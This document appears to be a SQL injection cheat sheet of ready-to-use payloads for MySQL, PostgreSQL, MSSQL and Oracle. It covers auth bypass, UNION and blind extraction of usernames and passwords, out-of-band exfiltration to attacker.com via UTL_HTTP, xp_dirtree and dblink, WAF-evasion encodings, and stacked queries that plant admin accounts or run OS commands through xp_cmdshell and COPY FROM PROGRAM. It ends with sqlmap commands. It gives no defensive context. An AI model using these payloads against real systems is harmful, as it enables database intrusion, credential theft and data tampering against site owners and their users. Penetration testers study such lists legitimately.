SQL Injection

'
''
`
"
""
' OR '1'='1
' AND '1'='2
1' AND 1=1--
1' AND 1=2--

-- MySQL
' AND SLEEP(5)--
' AND BENCHMARK(10000000,SHA1('test'))--

-- PostgreSQL  
'; SELECT pg_sleep(5)--
' AND 1=(SELECT 1 FROM pg_sleep(5))--

-- MSSQL
'; WAITFOR DELAY '0:0:5'--
' AND 1=1; WAITFOR DELAY '0:0:5'--

-- Oracle
' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--

' ORDER BY 1--
' ORDER BY 5--
' ORDER BY 10--
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

' UNION SELECT 'a',NULL,NULL--
' UNION SELECT NULL,'a',NULL--
' UNION SELECT NULL,NULL,'a'--

-- MySQL
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password FROM users--

-- Concatenation
' UNION SELECT CONCAT(username,':',password),NULL FROM users--
' UNION SELECT GROUP_CONCAT(username,0x3a,password),NULL FROM users--

-- PostgreSQL
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT string_agg(username||':'||password,','),NULL FROM users--

-- MSSQL
' UNION SELECT name,NULL FROM sysobjects WHERE xtype='U'--
' UNION SELECT username+':'+password,NULL FROM users--

-- Character extraction
' AND SUBSTRING(username,1,1)='a'--
' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--

-- Binary search (faster)
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>64--
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>96--
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>112--

-- MySQL
' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(3),0)--
' AND IF((SELECT COUNT(*) FROM users WHERE username='admin')=1,SLEEP(3),0)--

-- PostgreSQL
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(3) ELSE pg_sleep(0) END)--
' AND (SELECT CASE WHEN SUBSTRING(username,1,1)='a' THEN pg_sleep(3) ELSE pg_sleep(0) END FROM users LIMIT 1)--

-- MSSQL
'; IF (SELECT COUNT(*) FROM users WHERE username='admin')=1 WAITFOR DELAY '0:0:3'--

-- MySQL (requires FILE privilege)
SELECT LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\a'));
SELECT ... INTO OUTFILE '\\\\attacker.com\a'

-- MSSQL
'; EXEC master..xp_dirtree '\\attacker.com\a'--
'; EXEC master..xp_fileexist '\\attacker.com\a'--
DECLARE @a varchar(1024);SET @a=db_name();EXEC('master..xp_dirtree "\\'+@a+'.attacker.com\a"')--

-- Oracle
SELECT UTL_HTTP.REQUEST('http://attacker.com/'||password) FROM users;
SELECT HTTPURITYPE('http://attacker.com/'||password).getclob() FROM users;
SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT password FROM users WHERE ROWNUM=1)||'.attacker.com') FROM dual;

-- PostgreSQL
CREATE EXTENSION dblink;
SELECT dblink_connect('host=attacker.com user='||(SELECT password FROM users LIMIT 1)||' password=a dbname=a');

-- Oracle
SELECT UTL_HTTP.REQUEST('http://attacker.com/?data='||password) FROM users;

/**/
/*! */          -- MySQL inline comment
/*! 50000 */    -- MySQL version comment
#
-- -
;%00

/**/
%09  -- Tab
%0a  -- Newline
%0b  -- Vertical tab
%0c  -- Form feed
%0d  -- Carriage return
%a0  -- Non-breaking space

-- Examples
UNION/**/SELECT/**/1
UNION%09SELECT%091
UNION%0aSELECT%0a1

-- Case variation
SeLeCt, sElEcT, SELECT

-- Double encoding
%2527 → %27 → '
%252f → %2f → /

-- Unicode
%u0027 → '
%uff07 → '

-- Keyword splitting
SEL/**/ECT
SELE%00CT (null byte)
SELECT%0d%0a1

-- Alternative functions
SUBSTRING → MID, SUBSTR
ASCII → ORD
BENCHMARK → SLEEP

-- Comparison
= → LIKE
= → REGEXP
= → RLIKE (MySQL)
= → SIMILAR TO (PostgreSQL)

-- AND/OR bypass
AND → &&
OR  → ||
NOT → !

-- UNION bypass
UNION SELECT → UNION ALL SELECT
UNION SELECT → /*!00000UNION*/ /*!00000SELECT*/

-- Hex encoding (MySQL)
SELECT 0x61646d696e  -- 'admin'
WHERE username=0x61646d696e

-- CHAR function
SELECT CHAR(97,100,109,105,110)  -- 'admin'

-- Base64 (if app decodes)
' UNION SELECT FROM_BASE64('YWRtaW4=')--

-- MSSQL (common)
'; INSERT INTO users VALUES('hacker','password')--
'; UPDATE users SET password='hacked' WHERE username='admin'--
'; EXEC xp_cmdshell 'whoami'--

-- PostgreSQL
'; INSERT INTO users VALUES('hacker','password')--
'; CREATE TABLE cmd_output(output TEXT); COPY cmd_output FROM PROGRAM 'id'--

-- MySQL (PDO/mysqli with multi-query)
'; INSERT INTO users VALUES('hacker','password')--#

# Stored in database, executed later
# Common vectors:
- User registration (username stored, used in query later)
- Profile updates
- Password reset flows
- Admin dashboard queries
- Report generation
- Search history

# Test: Register username as payload
admin'--
admin' OR '1'='1

- Login forms (auth bypass)
- Password reset (token extraction)
- Search functionality (data extraction)
- API endpoints with ID parameters
- GraphQL queries
- Order/sort parameters
- Numeric IDs (often less sanitized)

1. JSON/XML body parameters (often less filtered)
2. HTTP headers (X-Forwarded-For, Referer, User-Agent)
3. Cookie values
4. Numeric parameters (type juggling)
5. Array parameters: id[]=1 UNION SELECT
6. Wildcard searches with LIKE
7. ORDER BY / GROUP BY injection
8. LIMIT/OFFSET parameters

# With request file (most reliable)
sqlmap -r request.txt --batch --dbs

# High risk for WAF bypass
sqlmap -r request.txt --level=5 --risk=3 --tamper=space2comment,between

# OOB when blind is too slow
sqlmap -r request.txt --dns-domain=attacker.com

# Specific parameter
sqlmap -u "https://target.com/api?id=1" -p id --technique=BUT

# Through proxy
sqlmap -r request.txt --proxy=http://127.0.0.1:8080

--tamper=space2comment      # /**/
--tamper=between           # BETWEEN instead of >
--tamper=randomcase        # rAnDoM CaSe
--tamper=charencode        # URL encode
--tamper=equaltolike       # = to LIKE
--tamper=greatest          # > to GREATEST
--tamper=apostrophemask    # Unicode apostrophe
--tamper=space2morehash    # MySQL specific